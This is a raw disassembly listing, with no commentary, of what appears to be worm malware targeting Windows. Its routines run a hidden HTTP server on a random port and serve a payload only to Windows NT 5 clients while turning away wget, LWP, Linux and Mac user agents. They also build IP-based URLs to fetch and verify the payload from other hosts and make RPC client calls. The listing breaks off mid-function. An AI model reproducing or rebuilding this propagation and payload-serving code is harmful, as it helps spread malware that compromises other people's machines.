push 7 ; int
lea eax, [ebp+len]
push eax ; len
push esi ; s
call sub_9AC864
add esp, 0Ch
mov edi, eax
mov [ebp+var_28], edi
cmp edi, ebx
jz loc_9AFBDF
push offset dword_9BB2D0
mov esi, offset aGetSHttp ; "get /%s http/"
push esi ; Format
push 200h ; Count
lea eax, [ebp+Buf2]
push eax ; Dest
mov ebx, _snprintf
call ebx ; _snprintf
mov [ebp+var_9D], 0
push offset dword_9BB2E8
push esi ; Format
push 40h ; Count
lea eax, [ebp+Str]
push eax ; Dest
call ebx ; _snprintf
mov [ebp+var_5D], 0
push offset dword_9BB2DC
push esi ; Format
push 200h ; Count
lea eax, [ebp+var_49C]
push eax ; Dest
call ebx ; _snprintf
add esp, 30h
mov [ebp+var_29D], 0
mov eax, [ebp+len]
test eax, eax
jz short loc_9AF8B2
mov byte ptr [eax+edi-1], 0
push edi ; Str
call _strlwr
pop ecx
loc_9AF8B2: ; CODE XREF: sub_9AF7D5+CE�j
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
pop ecx
cmp [ebp+len], eax
jle short loc_9AF8F1
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
push eax ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
push edi ; Buf1
call memcmp
add esp, 10h
test eax, eax
jnz short loc_9AF8F1
mov [ebp+var_1C], 1
jmp loc_9AF976
; ---------------------------------------------------------------------------
loc_9AF8F1: ; CODE XREF: sub_9AF7D5+ED�j
; sub_9AF7D5+10E�j
lea eax, [ebp+Str]
push eax ; Str
call strlen
pop ecx
cmp [ebp+len], eax
jle short loc_9AF92D
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax ; Size
lea eax, [ebp+Str]
push eax ; Buf2
push edi ; Buf1
call memcmp
add esp, 10h
test eax, eax
jnz short loc_9AF92D
mov [ebp+var_1C], 2
jmp short loc_9AF976
; ---------------------------------------------------------------------------
loc_9AF92D: ; CODE XREF: sub_9AF7D5+12C�j
; sub_9AF7D5+14D�j
lea eax, [ebp+var_49C]
push eax ; Str
call strlen
pop ecx
cmp [ebp+len], eax
jle short loc_9AF976
lea eax, [ebp+var_49C]
push eax ; Str
call strlen
push eax ; Size
lea eax, [ebp+var_49C]
push eax ; Buf2
push edi ; Buf1
call memcmp
add esp, 10h
test eax, eax
jnz short loc_9AF976
push offset CriticalSection
call sub_9A8BBE
pop ecx
test eax, eax
jz short loc_9AF976
mov [ebp+var_1C], 3
loc_9AF976: ; CODE XREF: sub_9AF7D5+117�j
; sub_9AF7D5+156�j ...
cmp [ebp+var_1C], 0
jz loc_9AFBDF
xor esi, esi
inc esi
mov [ebp+var_2C], esi
push [ebp+netlong] ; netlong
call sub_9A9DA6
pop ecx
test eax, eax
jnz loc_9AFA36
cmp [ebp+var_1C], esi
jz short loc_9AF9A6
cmp [ebp+var_1C], 3
jnz loc_9AFA65
loc_9AF9A6: ; CODE XREF: sub_9AF7D5+1C5�j
push offset asc_9A4B88 ; "\r\n\r"
push edi ; Str
mov esi, strstr
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz loc_9AFA65
push offset aUserAgent ; "\r\nuser-agent:"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_4C], edi
test edi, edi
jz short loc_9AFA33
push offset asc_9A4200 ; "\r\n"
lea eax, [edi+2]
push eax ; Str
call esi ; strstr
pop ecx
pop ecx
mov [ebp+var_48], eax
test eax, eax
jz short loc_9AFA33
mov byte ptr [eax], 0
push offset aWindowsNt5_ ; "windows nt 5."
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9AFA33
push offset aWget ; "wget"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AFA33
push offset aLwp ; "lwp::"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AFA33
push offset aLinux ; "linux"
push edi ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AFA33
push offset aMacintosh ; "macintosh"
push [ebp+var_28] ; Str
call esi ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_9AFA33
and [ebp+var_2C], eax
loc_9AFA33: ; CODE XREF: sub_9AF7D5+1FA�j
; sub_9AF7D5+20E�j ...
mov edi, [ebp+var_28]
loc_9AFA36: ; CODE XREF: sub_9AF7D5+1BC�j
; sub_9AF7D5+294�j
xor esi, esi
cmp [ebp+var_2C], esi
jnz short loc_9AFA80
cmp [ebp+var_1C], 3
jnz short loc_9AFA6B
lea eax, [ebp+var_24]
push eax ; int
lea eax, [ebp+hMem]
push eax ; int
push offset CriticalSection ; lpCriticalSection
call sub_9A8CB7
add esp, 0Ch
test eax, eax
jnz short loc_9AFA7B
mov [ebp+var_2C], 1
jmp short loc_9AFA7B
; ---------------------------------------------------------------------------
loc_9AFA65: ; CODE XREF: sub_9AF7D5+1CB�j
; sub_9AF7D5+1E3�j
and [ebp+var_2C], 0
jmp short loc_9AFA36
; ---------------------------------------------------------------------------
loc_9AFA6B: ; CODE XREF: sub_9AF7D5+26C�j
mov eax, lpBuffer
mov [ebp+hMem], eax
mov eax, nNumberOfBytesToWrite
mov [ebp+var_24], eax
loc_9AFA7B: ; CODE XREF: sub_9AF7D5+285�j
; sub_9AF7D5+28E�j
cmp [ebp+var_2C], esi
jz short loc_9AFA9C
loc_9AFA80: ; CODE XREF: sub_9AF7D5+266�j
mov [ebp+var_1C], 4
mov [ebp+hMem], esi
call rand
add eax, 64h
imul eax, 3E8h
mov [ebp+var_24], eax
loc_9AFA9C: ; CODE XREF: sub_9AF7D5+2A9�j
call rand
and eax, 3
push off_9BAD98[eax*4]
push [ebp+var_24]
push offset aHttp1_0200OkPr ; "HTTP/1.0 200 OK\r\nPragma: no-cache\r\nCont"...
push 200h ; Count
lea eax, [ebp+Buf2]
push eax ; Dest
call ebx ; _snprintf
add esp, 14h
mov [ebp+var_9D], 0
mov [ebp+var_3C], esi
push 7 ; int
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
pop ecx
push eax ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+s] ; s
call sub_9AC931
mov esi, eax
lea eax, [ebp+Buf2]
push eax ; Str
call strlen
add esp, 14h
cmp eax, esi
jnz short loc_9AFB72
cmp [ebp+var_1C], 4
jz short loc_9AFB2A
push 7 ; int
push [ebp+var_24] ; int
push [ebp+hMem] ; int
push [ebp+s] ; s
call sub_9AC931
add esp, 10h
cmp [ebp+var_24], eax
jnz short loc_9AFB72
mov [ebp+var_3C], 1
jmp short loc_9AFB72
; ---------------------------------------------------------------------------
loc_9AFB2A: ; CODE XREF: sub_9AF7D5+332�j
mov esi, 1FFh
loc_9AFB2F: ; CODE XREF: sub_9AF7D5+39B�j
push esi
lea eax, [ebp+Buf2]
push eax
call sub_9AC642
pop ecx
pop ecx
call rand
cdq
mov ecx, 1388h
idiv ecx
add edx, 6A4h
push edx ; dwMilliseconds
call Sleep
push 7 ; int
push esi ; int
lea eax, [ebp+Buf2]
push eax ; int
push [ebp+s] ; s
call sub_9AC931
add esp, 10h
cmp eax, esi
jz short loc_9AFB2F
loc_9AFB72: ; CODE XREF: sub_9AF7D5+32C�j
; sub_9AF7D5+34A�j ...
cmp [ebp+var_3C], 0
jz short loc_9AFBCA
cmp [ebp+var_1C], 1
jnz short loc_9AFBA8
push offset dword_9BAF78 ; lpAddend
call InterlockedIncrement
push dword_9BAF78 ; Data
call sub_9A91B5
push [ebp+var_40]
push [ebp+netlong]
call sub_9ADA44
add esp, 0Ch
cmp [ebp+var_1C], 1
jz short loc_9AFBAE
loc_9AFBA8: ; CODE XREF: sub_9AF7D5+3A7�j
cmp [ebp+var_1C], 3
jnz short loc_9AFBDF
loc_9AFBAE: ; CODE XREF: sub_9AF7D5+3D1�j
push [ebp+netlong]
call sub_9AC384
pop ecx
test eax, eax
jz short loc_9AFBCA
push [ebp+netlong] ; int
push offset CriticalSection ; lpCriticalSection
call sub_9A8C17
pop ecx
pop ecx
loc_9AFBCA: ; CODE XREF: sub_9AF7D5+3A1�j
; sub_9AF7D5+3E4�j
cmp [ebp+var_1C], 3
jnz short loc_9AFBDF
cmp [ebp+hMem], 0
jz short loc_9AFBDF
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AFBDF: ; CODE XREF: sub_9AF7D5+6A�j
; sub_9AF7D5+1A5�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AFBF3
; ---------------------------------------------------------------------------
loc_9AFBE5: ; DATA XREF: .text:stru_9A4BA0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AFBE9: ; DATA XREF: .text:stru_9A4BA0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_28]
loc_9AFBF3: ; CODE XREF: sub_9AF7D5+40E�j
test edi, edi
jz short loc_9AFBFE
push edi ; hMem
call GlobalFree
loc_9AFBFE: ; CODE XREF: sub_9AF7D5+420�j
push 1 ; how
push [ebp+s] ; s
call shutdown
push [ebp+s] ; s
call closesocket
push [ebp+var_44] ; hMem
call GlobalFree
xor eax, eax
call __SEH_epilog
retn 4
sub_9AF7D5 endp
; =============== S U B R O U T I N E =======================================
sub_9AFC25 proc near ; CODE XREF: sub_9AFD0A+83�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
sub esp, 18h
push ebx
push ebp
push edi
xor edi, edi
push 10h ; Size
lea eax, [esp+28h+Dst]
push edi ; Val
push eax ; Dst
mov [esp+30h+var_14], edi
call memset
mov [esp+30h+Dst], 2
mov [esp+30h+var_C], edi
call sub_9AC33E
push eax ; Seed
call srand
mov ebx, Sleep
add esp, 10h
mov [esp+24h+var_18], edi
mov ebp, 1388h
loc_9AFC67: ; CODE XREF: sub_9AFC25+C0�j
call rand
cdq
mov ecx, 2310h
idiv ecx
mov edi, edx
add edi, 400h
push edi
call sub_9A9FDF
test eax, eax
pop ecx
jnz short loc_9AFC9F
cmp dword_9BB2F8, eax
jnz short loc_9AFCA2
call sub_9A9CA1
mov dword_9BB2F8, 1
loc_9AFC9F: ; CODE XREF: sub_9AFC25+61�j
push ebp ; dwMilliseconds
call ebx ; Sleep
loc_9AFCA2: ; CODE XREF: sub_9AFC25+69�j
push 6 ; protocol
push 1 ; type
push 2 ; af
call socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_9AFCF1
push edi ; netshort
call ntohs
mov [esp+24h+var_E], ax
push 10h ; namelen
lea eax, [esp+28h+Dst]
push eax ; name
push dword ptr [esi] ; s
call bind
test eax, eax
jz short loc_9AFCE9
push dword ptr [esi] ; s
call closesocket
inc [esp+24h+var_18]
cmp [esp+24h+var_18], 0Ah
jl short loc_9AFC67
jmp short loc_9AFCF1
; ---------------------------------------------------------------------------
loc_9AFCE9: ; CODE XREF: sub_9AFC25+AD�j
mov [esp+24h+var_14], 1
loc_9AFCF1: ; CODE XREF: sub_9AFC25+8E�j
; sub_9AFC25+C2�j
call sub_9AC50B
mov eax, [esp+24h+var_14]
movzx ecx, di
neg eax
pop edi
sbb eax, eax
pop ebp
and eax, ecx
pop ebx
add esp, 18h
retn
sub_9AFC25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9AFD0A(LPVOID)
sub_9AFD0A proc near ; DATA XREF: sub_9AFE8D+18�o
readfds = fd_set ptr -220h
exceptfds = fd_set ptr -11Ch
addr = sockaddr ptr -18h
ThreadId = dword ptr -8
addrlen = dword ptr -4
push ebp
mov ebp, esp
sub esp, 220h
call sub_9AC50B
cmp lpBuffer, 0
jz loc_9AFE86
cmp nNumberOfBytesToWrite, 0
jz loc_9AFE86
push esi
mov esi, rand
push edi
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
mov edi, offset dword_9BB2D0
add edx, 4
push edx
push edi
call sub_9AC642
push offset CriticalSection
call sub_9A8BBE
add esp, 0Ch
test eax, eax
jz short loc_9AFD72
push 9 ; int
push offset dword_9BB2DC ; int
push edi ; Str
call sub_9AD2C5
add esp, 0Ch
loc_9AFD72: ; CODE XREF: sub_9AFD0A+56�j
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
add edx, 4
push edx
push offset dword_9BB2E8
call sub_9AC642
pop ecx
pop ecx
lea esi, [ebp+addrlen]
call sub_9AFC25
mov esi, eax
test si, si
jz loc_9AFE72
mov edi, [ebp+addrlen]
push 32h ; backlog
push edi ; s
call listen
test eax, eax
jnz loc_9AFE6B
movzx eax, si
push ebx
push eax ; Value
push offset dword_9BB2F4 ; Target
mov [ebp+addrlen], 10h
call InterlockedExchange
xor ebx, ebx
inc ebx
loc_9AFDCB: ; CODE XREF: sub_9AFD0A+11B�j
; sub_9AFD0A+14F�j ...
xor eax, eax
push eax ; timeout
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
push eax ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push eax ; nfds
mov [ebp+readfds.fd_array], edi
mov [ebp+readfds.fd_count], ebx
mov [ebp+exceptfds.fd_array], edi
mov [ebp+exceptfds.fd_count], ebx
call select
test eax, eax
jle short loc_9AFE6A
lea eax, [ebp+exceptfds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet
test eax, eax
jnz short loc_9AFE6A
lea eax, [ebp+addrlen]
push eax ; addrlen
lea eax, [ebp+addr]
push eax ; addr
push edi ; s
call accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9AFDCB
push 8 ; dwBytes
push 40h ; uFlags
call GlobalAlloc
xor ecx, ecx
cmp eax, ecx
jz short loc_9AFE5E
mov [eax], esi
mov edx, dword ptr [ebp+addr.sa_data+2]
mov [eax+4], edx
lea edx, [ebp+ThreadId]
push edx ; lpThreadId
push ecx ; dwCreationFlags
push eax ; lpParameter
push offset sub_9AF7D5 ; lpStartAddress
push ecx ; dwStackSize
push ecx ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
jmp loc_9AFDCB
; ---------------------------------------------------------------------------
loc_9AFE5E: ; CODE XREF: sub_9AFD0A+12B�j
push esi ; s
call closesocket
jmp loc_9AFDCB
; ---------------------------------------------------------------------------
loc_9AFE6A: ; CODE XREF: sub_9AFD0A+F4�j
; sub_9AFD0A+105�j
pop ebx
loc_9AFE6B: ; CODE XREF: sub_9AFD0A+A1�j
push edi ; s
call closesocket
loc_9AFE72: ; CODE XREF: sub_9AFD0A+8D�j
push 0 ; Value
push offset dword_9BB2F4 ; Target
call InterlockedExchange
push 2
pop eax
pop edi
pop esi
jmp short locret_9AFE89
; ---------------------------------------------------------------------------
loc_9AFE86: ; CODE XREF: sub_9AFD0A+15�j
; sub_9AFD0A+22�j
xor eax, eax
inc eax
locret_9AFE89: ; CODE XREF: sub_9AFD0A+17A�j
leave
retn 4
sub_9AFD0A endp
; =============== S U B R O U T I N E =======================================
sub_9AFE8D proc near ; CODE XREF: StartAddress+190�p
ThreadId = dword ptr -4
push ecx
push esi
push edi
xor edi, edi
push edi ; Value
push offset dword_9BB2F4 ; Target
call InterlockedExchange
lea eax, [esp+0Ch+ThreadId]
push eax ; lpThreadId
push edi ; dwCreationFlags
push edi ; lpParameter
push offset sub_9AFD0A ; lpStartAddress
push edi ; dwStackSize
push edi ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
xor esi, esi
loc_9AFEBB: ; CODE XREF: sub_9AFE8D+45�j
cmp dword_9BB2F4, edi
jnz short loc_9AFED4
push 1F4h ; dwMilliseconds
call Sleep
inc esi
cmp esi, 64h
jl short loc_9AFEBB
loc_9AFED4: ; CODE XREF: sub_9AFE8D+34�j
mov eax, dword_9BB2F4
pop edi
pop esi
pop ecx
retn
sub_9AFE8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AFEDD proc near ; CODE XREF: sub_9ADBF1+19E�p
; sub_9ADBF1+2A4�p
szUrl = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
mov eax, dword_9BB2F4
push edi
xor edi, edi
cmp word ptr [ebp+arg_4], di
jnz short loc_9AFEF9
cmp ax, di
jz short loc_9AFF6C
loc_9AFEF9: ; CODE XREF: sub_9AFEDD+15�j
push esi
push offset dword_9BB2E8
push eax
mov eax, [ebp+arg_0]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_0+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aHttpD_D_D_DDS ; "http://%d.%d.%d.%d:%d/%s"
lea eax, [ebp+szUrl]
push 80h ; Count
push eax ; Dest
call _snprintf
push edi ; int
lea eax, [ebp+arg_4]
push eax ; int
lea eax, [ebp+szUrl]
push eax ; lpszUrl
call sub_9ACAC1
mov esi, eax
add esp, 30h
cmp esi, edi
jz short loc_9AFF6B
mov eax, nNumberOfBytesToWrite
cmp [ebp+arg_4], eax
jb short loc_9AFF64
push eax ; Size
push lpBuffer ; Buf2
push esi ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9AFF64
xor edi, edi
inc edi
loc_9AFF64: ; CODE XREF: sub_9AFEDD+6E�j
; sub_9AFEDD+82�j
push esi ; hMem
call GlobalFree
loc_9AFF6B: ; CODE XREF: sub_9AFEDD+64�j
pop esi
loc_9AFF6C: ; CODE XREF: sub_9AFEDD+1A�j
mov eax, edi
pop edi
leave
retn
sub_9AFEDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AFF71 proc near ; CODE XREF: sub_9AA82D+82�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+arg_0]
push eax
push offset pFormat ; pFormat
push offset pStubDescriptor ; pStubDescriptor
call NdrClientCall2
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_9AFF71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AFF93 proc near ; CODE XREF: sub_9AA799+5A�p
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+arg_0]
push eax
push offset byte_9A52E4 ; pFormat
push offset pStubDescriptor ; pStubDescriptor
call NdrClientCall2
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_9AFF93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AFFB5 proc near ; CODE XREF: sub_9B0216+1E�p
tstrFilename = byte ptr -134h
var_133 = byte ptr -133h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
dwHandle = dword ptr -28h
lpBuffer = dword ptr -24h
puLen = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 124h
push offset stru_9A6A48
call __SEH_prolog
mov [ebp+var_1C], 9
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+tstrFilename], bl
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_133]
rep stosd
stosw
stosb
push 104h ; nSize
lea eax, [ebp+tstrFilename]
push eax ; lpFilename
push offset aNtdll_dll ; "ntdll.dll"
call GetModuleHandleA
push eax ; hModule
call GetModuleFileNameA
lea eax, [ebp+dwHandle]
push eax ; lpdwHandle
lea eax, [ebp+tstrFilename]
push eax ; lptstrFilename
call GetFileVersionInfoSizeA
mov esi, eax
mov [ebp+var_30], esi
cmp esi, ebx
jz short loc_9B008B
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
mov [ebp+var_2C], edi
cmp edi, ebx
jz short loc_9B008B
push edi ; lpData
push esi ; dwLen
push ebx ; dwHandle
lea eax, [ebp+tstrFilename]
push eax ; lptstrFilename
call GetFileVersionInfoA
test eax, eax
jz short loc_9B007B
lea eax, [ebp+puLen]
push eax ; puLen
lea eax, [ebp+lpBuffer]
push eax ; lplpBuffer
push offset SubBlock ; "\\VarFileInfo\\Translation"
push edi ; pBlock
call VerQueryValueA
test eax, eax
jz short loc_9B007B
cmp [ebp+puLen], ebx
jz short loc_9B007B
mov eax, [ebp+lpBuffer]
movzx eax, word ptr [eax]
mov [ebp+var_1C], eax
cmp ax, 804h
jz short loc_9B007B
cmp ax, 416h
jz short loc_9B007B
and eax, 0FFFF03FFh
mov [ebp+var_1C], eax
loc_9B007B: ; CODE XREF: sub_9AFFB5+8B�j
; sub_9AFFB5+A2�j ...
push edi ; hMem
call GlobalFree
jmp short loc_9B008B
; ---------------------------------------------------------------------------
loc_9B0084: ; DATA XREF: .text:stru_9A6A48�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9B0088: ; DATA XREF: .text:stru_9A6A48�o
mov esp, [ebp+ms_exc.old_esp]
loc_9B008B: ; CODE XREF: sub_9AFFB5+66�j
; sub_9AFFB5+78�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ax, word ptr [ebp+var_1C]
call __SEH_epilog
retn
sub_9AFFB5 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B0099(const void *,const void *)
sub_9B0099 proc near ; DATA XREF: sub_9B00F5+80�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [eax]
cmp [esp+arg_0], ecx
jb short loc_9B00B4
movzx eax, byte ptr [eax+4]
add eax, ecx
cmp eax, [esp+arg_0]
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_9B00B4: ; CODE XREF: sub_9B0099+A�j
or eax, 0FFFFFFFFh
retn
sub_9B0099 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B00B8(const void *,const void *)
sub_9B00B8 proc near ; DATA XREF: sub_9B00F5+55�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [eax]
cmp [esp+arg_0], ecx
jb short loc_9B00D3
movzx eax, word ptr [eax+4]
add eax, ecx
cmp eax, [esp+arg_0]
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_9B00D3: ; CODE XREF: sub_9B00B8+A�j
or eax, 0FFFFFFFFh
retn
sub_9B00B8 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl PtFuncCompare(const void *,const void *)
PtFuncCompare proc near ; DATA XREF: sub_9B00F5+2A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [eax]
cmp [esp+arg_0], ecx
jb short loc_9B00F1
mov eax, [eax+4]
add eax, ecx
cmp eax, [esp+arg_0]
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_9B00F1: ; CODE XREF: PtFuncCompare+A�j
or eax, 0FFFFFFFFh
retn
PtFuncCompare endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B00F5(u_long netlong)
sub_9B00F5 proc near ; CODE XREF: sub_9B0191+27�p
netlong = dword ptr 4
push ebx
push esi
push edi
push [esp+0Ch+netlong] ; netlong
or bl, 0FFh
call ntohl
mov esi, bsearch
mov edi, eax
mov eax, Base
test eax, eax
jz short loc_9B0137
mov ecx, NumOfElements
test ecx, ecx
jz short loc_9B0137
push offset PtFuncCompare ; PtFuncCompare
push 9 ; SizeOfElements
push ecx ; NumOfElements
push eax ; Base
push edi ; Key
call esi ; bsearch
add esp, 14h
test eax, eax
jz short loc_9B0137
mov bl, [eax+8]
jmp short loc_9B018B
; ---------------------------------------------------------------------------
loc_9B0137: ; CODE XREF: sub_9B00F5+1E�j
; sub_9B00F5+28�j ...
mov ecx, dword_9BB310
test ecx, ecx
jz short loc_9B0162
mov eax, dword_9BB314
test eax, eax
jz short loc_9B0162
push offset sub_9B00B8 ; PtFuncCompare
push 7 ; SizeOfElements
push eax ; NumOfElements
push ecx ; Base
push edi ; Key
call esi ; bsearch
add esp, 14h
test eax, eax
jz short loc_9B0162
mov bl, [eax+6]
jmp short loc_9B018B
; ---------------------------------------------------------------------------
loc_9B0162: ; CODE XREF: sub_9B00F5+4A�j
; sub_9B00F5+53�j ...
mov ecx, dword_9BB300
test ecx, ecx
jz short loc_9B018B
mov eax, dword_9BB2FC
test eax, eax
jz short loc_9B018B
push offset sub_9B0099 ; PtFuncCompare
push 6 ; SizeOfElements
push eax ; NumOfElements
push ecx ; Base
push edi ; Key
call esi ; bsearch
add esp, 14h
test eax, eax
jz short loc_9B018B
mov bl, [eax+5]
loc_9B018B: ; CODE XREF: sub_9B00F5+40�j
; sub_9B00F5+6B�j ...
pop edi
pop esi
mov al, bl
pop ebx
retn
sub_9B00F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B0191(u_long netlong)
sub_9B0191 proc near ; CODE XREF: sub_9AABAE+57�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_19 = byte ptr -19h
ms_exc = CPPEH_RECORD ptr -18h
netlong = dword ptr 8
push 14h
push offset stru_9A6A58
call __SEH_prolog
mov [ebp+var_24], 9
and [ebp+ms_exc.disabled], 0
push [ebp+netlong]
call sub_9AC384
pop ecx
test eax, eax
jz short loc_9B01F7
push [ebp+netlong] ; netlong
call sub_9B00F5
pop ecx
mov [ebp+var_19], al
cmp al, 0FFh
jz short loc_9B0208
and [ebp+var_20], 0
loc_9B01C9: ; CODE XREF: sub_9B0191+64�j
cmp [ebp+var_20], 17h
jnb short loc_9B0208
mov ecx, [ebp+var_20]
shl ecx, 2
cmp al, byte_9A69D0[ecx]
jb short loc_9B01F2
cmp al, byte_9A69D1[ecx]
ja short loc_9B01F2
mov ax, word_9A69D2[ecx]
mov word ptr [ebp+var_24], ax
jmp short loc_9B0208
; ---------------------------------------------------------------------------
loc_9B01F2: ; CODE XREF: sub_9B0191+4A�j
; sub_9B0191+52�j
inc [ebp+var_20]
jmp short loc_9B01C9
; ---------------------------------------------------------------------------
loc_9B01F7: ; CODE XREF: sub_9B0191+22�j
mov eax, dword_9BB304
mov [ebp+var_24], eax
jmp short loc_9B0208
; ---------------------------------------------------------------------------
loc_9B0201: ; DATA XREF: .text:stru_9A6A58�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9B0205: ; DATA XREF: .text:stru_9A6A58�o
mov esp, [ebp+ms_exc.old_esp]
loc_9B0208: ; CODE XREF: sub_9B0191+32�j
; sub_9B0191+3C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ax, word ptr [ebp+var_24]
call __SEH_epilog
retn
sub_9B0191 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0216 proc near ; CODE XREF: StartAddress+1A1�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 10h
push offset stru_9A6A78
call __SEH_prolog
xor esi, esi
cmp word ptr dword_9BB304, si
jnz loc_9B02EF
mov [ebp+ms_exc.disabled], esi
call sub_9AFFB5
mov word ptr dword_9BB304, ax
cmp [ebp+arg_0], esi
jz loc_9B02EB
mov ebx, [ebp+arg_4]
cmp ebx, esi
jz loc_9B02EB
mov [ebp+var_1C], ebx
push 0Ch
mov edi, offset dword_9A6A64
push edi
push ebx
push [ebp+arg_0]
call sub_9AF1A2
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_9B02F5
mov esi, eax
mov [ebp+var_20], esi
push 0Ch
push edi
push ebx
push [ebp+arg_0]
call sub_9AF1A2
add esp, 28h
test esi, esi
jz short loc_9B02EB
cmp [ebp+var_1C], 0
jz short loc_9B02EB
lea eax, [esi+4]
mov dword_9BB300, eax
mov ecx, [esi]
mov eax, ecx
xor edx, edx
push 6
pop edi
div edi
mov dword_9BB2FC, eax
lea eax, [ecx+esi+8]
mov dword_9BB310, eax
mov eax, [ecx+esi+4]
xor edx, edx
push 7
pop edi
div edi
mov dword_9BB314, eax
mov eax, [ecx+esi+4]
add eax, ecx
add eax, esi
lea ecx, [eax+0Ch]
mov Base, ecx
mov eax, [eax+8]
xor edx, edx
push 9
pop ecx
div ecx
mov NumOfElements, eax
jmp short loc_9B02EB
; ---------------------------------------------------------------------------
loc_9B02E4: ; DATA XREF: .text:stru_9A6A78�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9B02E8: ; DATA XREF: .text:stru_9A6A78�o
mov esp, [ebp+ms_exc.old_esp]
loc_9B02EB: ; CODE XREF: sub_9B0216+2C�j
; sub_9B0216+37�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_9B02EF: ; CODE XREF: sub_9B0216+15�j
call __SEH_epilog
retn
sub_9B0216 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B02F5 proc near ; CODE XREF: sub_9B0216+58�p
Memory = dword ptr -450h
var_44C = byte ptr -44Ch
var_430 = dword ptr -430h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 440h
push offset stru_9A6A88
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+ms_exc.disabled], ebx
mov esi, [ebp+arg_4]
push dword ptr [esi] ; Size
push ebx ; char
push [ebp+arg_0] ; int
call sub_9B50DB
add esp, 0Ch
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jz loc_9B03C6
mov [ebp+Memory], ebx
mov ecx, 108h
xor eax, eax
